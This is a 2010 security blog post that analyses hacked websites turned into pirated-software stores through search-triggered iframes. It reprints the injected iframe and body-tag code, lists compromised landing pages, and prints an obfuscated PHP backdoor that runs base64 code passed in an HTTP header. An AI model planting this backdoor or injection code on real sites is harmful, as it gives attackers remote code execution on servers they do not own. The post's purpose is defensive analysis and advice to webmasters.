msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Hackers Turn Legitimate Websites into Underground Software Stores

   10 Dec 10   Filed in Website exploits

This is the time of the year when online sellers do their best to attract herds of holiday shoppers. Software pirates are no different. They offer huge discounts (up to 95%) for popular and expensive software products and provide user-friendly online stores. They even made their sites one step closer to you!

I’ve already written about black hat SEO schemes that pirates use to drive traffic to their sites. They all include compromising established legitimate sites and poisoning first pages of Google’s search results with links to doorway pages on hacked sites that redirect searchers further to illegal stores on servers controlled by criminals.

The doorway pages on legitimate websites is an important part of the scheme

  • They are the pages that pirates promote in search engines
  • They take advantage of established reputation of hacked site — thus require less efforts to reach high rankings
  • They channel search traffic to underground websites
  • They hide underground websites from search engines
  • They transparently redirect traffic to new sites when criminals change domain names of their resources.

Eliminating doorway pages

However, there is a new development in this area. Instead of placing just doorway pages on compromised sites, hackers now create whole online stores there.

Here’s how it works: The keyword-rich spammy web pages on hacked sites check whether a visitor comes from a search engine and inject a full screen iframe at the very top of a web page. The iframe contains a familiar “software discounter” online store (identical to the ones I wrote before).

software discounter in an iframe

Note the double scrollbars on the screenshot — one pair of scrollbars belong to an iframe and the other to the entire web page. If you scroll down, you’ll see normal content of that web page.

Not every visitor from search engines can see that iframe. If a search query includes a “site:” operator, the iframe won’t be injected into the landing pages. Probably, the idea was to hide the shop from webmasters who use the “site:” searches. However the implementation of this idea is quite stupid — while the shop iframe is not visible, the spammy content on the landing page remains intact — a webmaster will be immediately aware of the compromise.

Local store pages

Although iframes allow to load web pages from third-party sites, in this case they load the “shop” pages from the same site. Here is a typical iframe code injected at the very bottom of a landing page:

<iframe border=0 style="border:none" width="100%" height="100%" src="/?vprx=1&prx=nUE0pQbiY2kcqzHgp29zqUqupzHhozI0Y3Abo3Nip2IupzAbYm9mCJSlL2ucL2SxWzAjow02ZwD%3D&nd=Ym92pUW4CGRzpUW4CJ5IEGOjHJWcJGWeL3S6FTqjZwy6pIIkqKO6FTuirxxjJGAOLz8mGzyjZxy1pUcOLyygBJ1QFyAfGQW1L0jlH3uKrxSdo3pjZyc3EPHmEN%3D%3D"></iframe>

To make sure that styles and scripts on a hijacked web page don’t interfere with the shop iframe, hackers make the following change to the <body> tag:

<body style="margin:0px;padding:0px;width:100%;height:100%"><script>document.write('<noscript>');</script>

All images and style sheets are also loaded from the same domain. They all have similar URL structure. Something like this:

/?vprx=1&prx=nUE0pQbiY2kcqzHgp29zqUqupzHhozI0Y2ygLJqypl9wLKEuoT9aqJHiAwV2K2kcp3DhnaOa

The indexed landing pages have URLs that also follow specific pattern: example.com/?word=number or example.com/path/file?word=number

This makes me think that index files on these sites contain injected code that processes requests with specific parameters to generate spammy landing pages (?word=number) and “shop” web pages (?vprx=1&prx=….)

Here is a list of real landing pages on compromised sites.
acadiarental.com/page1.html?art=585
adaptvietnam.org/?qw=143
bigmediablog.com/?prnt=410
blog.famiva.net/?catalog-=751
burlingtongreen.org/index.php?great_deal=389
dc2008.wordcamped.org/?oem_id=378
dcrustm.org/?all=284
deanesmay.com/?pst=472
emeryed.org/?student=335
gatmo.org/?low_price=415
girlzdestruct.com/media/?cheap_price=66
hanaroda.net/?pro_soft=61
icannatlarge.com/?sale_discount=170
jeff-o-rama.com/?q_id=123
macbundlebox.com/discuss/?quality=522
mandhro.com/?special_offers=225
matchmeats.com/?reliable=151
mikewhitesite.com/netflix_queue.php?discounted=245
motionplex.org/?motion=917
mutablesound.com/home/?post_id=774
paintingsbybruce.com/mononcle.htm?soft_id=606
perceptdev.com/labs/comment/reply/30/105?program=2111
performancejournalism.com/?special_prices=31
pinelakeprep.org/Lower/LS_home.html?software=792
pinelakeprep.org/immunize.html?software=232
pinelakeprep.org/Welcome.html?software=41
pooja.myjoyz.com/?p=68
ruben.fm/?software=7
sicrono.com/?qpl=654
speechology.org/?oem=168
sturgeonslaw.com/?november_sale=93
territorytellers.org/?coins=321
theluxecard.com/?qup=542
thestateofflux.com/?software=210
the-dream.co.uk/?best=562
tkh-generator.net/?adobe=11
tourismnorthernrockies.ca/things_hunting.php?com-t=921
twt.randomcasts.com/?no-prescription=4273

Poisoned search results

These rogue sites do pretty well in search results

buy Graphisoft ArchiCAD
"buy discount Dragon NaturallySpeaking 10"

On the latter screenshot, you can see how Google thinks that the rogue site on the-dream.co.uk matches the query (that returns 178,000 results) so well that it deserves 3 positions on the first page of search results plus the “+ show more results from the-dream.co.uk” link.

Dreamhost

Maybe it’s just a coincidence, but about 85% of the hacked sites with installed pirated software stores were found on different IPs on DreamHost networks:

  • 5 sites on 75.119.192.0 – 75.119.223.255 (United States Brea New Dream Network Llc)
  • 9 sites on 67.205.0.0 – 67.205.63.255 (United States Brea New Dream Network Llc)
  • 16 sites on 69.163.128.0 – 69.163.255.255 (United States Brea New Dream Network Llc)

Most of these sites are on shared servers. And when I check other sites on those servers I usually find a few more sites with spammy links and doorway pages.

This sort of hacked sites distribution makes me suspect that DreamHost servers are somehow attractive to hackers. Probably, there is a way for attackers to hop from server to server and search for hackable sites.

The same black-hat SEO campaign

As far as I can see, the rogue software stores on hacked legitimate sites are basically the same as the ones on dedicated servers that I described both last week and a year ago. Their look&feel is the same, and on the final “checkout” step, they redirect to well-known “paym8″ sites (e.g. payment8ltd .net/shop/order/ or 8payment. net/shop/order/).

I still don’t have enough information on how these shops work internally. I tried to contact webmasters of compromised sites, but at this point only received a couple of backdoor scripts. For example this file called .php:

<?php
$_0f4f6b="\x70\x72\x65\x67\x5f\x72\x65\x70 \x6c\x61\x63\x65";$_0f4f6b("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1 FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');
?>

which translates to something like this:

eval('eval("if(md5($_SERVER['HTTP_QUOTE'])=='e66e6cadd6e13efea54ed50c0eb2d32b' and isset($_SERVER['HTTP_X_CODE']))
@eval(@base64_decode(strrev(@$_SERVER['HTTP_X_CODE'])));"));

To webmasters

I guess, it is clear that illegal online stores create serious problems for owners of compromised sites. Not only can they hurt search engine ranking for normal keywords and incur penalties, but also may be a reason to remove your website from a server (most hosting ToS prohibit selling pirated software).

Please check my doorway/spammy links detection instructions that I posted last week — they are also useful for revealing any unwanted content on your site, including such rogue stores.

You should also regularly check access logs (not just Google Analytics that only tracks visitors with enabled JavaScript) for suspicious requests — they may help you identify backdoor scripts, vulnerable files and rogue sections of your site. Pay a special attention to POST requests.

Make sure that your files and directories are not world-writable. Leaving anything where your server neighbors can write to is an invitation to abuse your site.

Finally, if you find one of such shops on you site, you should contact the pirates (they provide a toll-free contact phone number +1-866-576-8741) and ask for your share in sales (don’t agree on less than 50%).

As always, I’m interested in any internal information about this sort of hacks. If you are a webmaster of a hacked site, or a representative of a hosting provider, please share your finding here in comments, or, if you don’t want to publicly disclose any sensitive information you can contact me directly. Thanks

Related posts:

Reader's Comments (2)

  1. |

    [...] This post was mentioned on Twitter by John Mueller and Denis, PhysicalDrive0. PhysicalDrive0 said: RT @unmaskparasites: [blog] Hackers Turn Legitimate Websites into Underground Software Stores http://bit.ly/gW2Qle – doorways are not enough [...]

  2. |

    If you look at the site similar to the one mentioned above (www.buysupreme.net)and do a reverse DNS lookup, you will see it is hosted in Hong Kong, including the Secure Payment Site.

    They claim to be in Georgia.

    So, it’s always a good idea to do this on any site you are unsure of. It is no guarantee but at least you can see if they are where they say they are.

    I used this site to do the lookup (I am not associated with this site)

    http://www.ipchecking.com